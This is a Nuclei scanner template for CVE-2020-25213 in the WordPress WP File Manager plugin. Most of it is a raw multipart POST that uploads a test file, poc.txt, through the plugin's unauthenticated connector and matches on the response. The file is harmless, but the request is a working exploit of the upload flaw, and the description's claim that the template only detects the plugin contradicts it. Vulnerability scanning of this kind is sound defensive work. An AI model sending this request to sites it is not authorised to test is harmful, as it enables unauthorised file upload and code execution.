nuclei-templates/cves/2020/CVE-2020-25213.yaml

63 lines
1.8 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-202025213
info:
name: WP File Manager RCE
author: foulenzer
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
tags: cve,cve2020,wordpress,rce
# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
requests:
- raw:
- |
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host: {{Hostname}}
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 608
Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
Connection: close
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="reqid"
17457a1fe6959
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="cmd"
upload
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="target"
l1_Lw
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="mtime[]"
1576045135
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
Content-Type: text/plain
poc-test
--------------------------ca81ac1fececda48--
matchers-condition: and
matchers:
- type: word
words:
- poc.txt
- added
condition: and
- type: word
words:
- application/json
part: header
- type: status
status:
- 200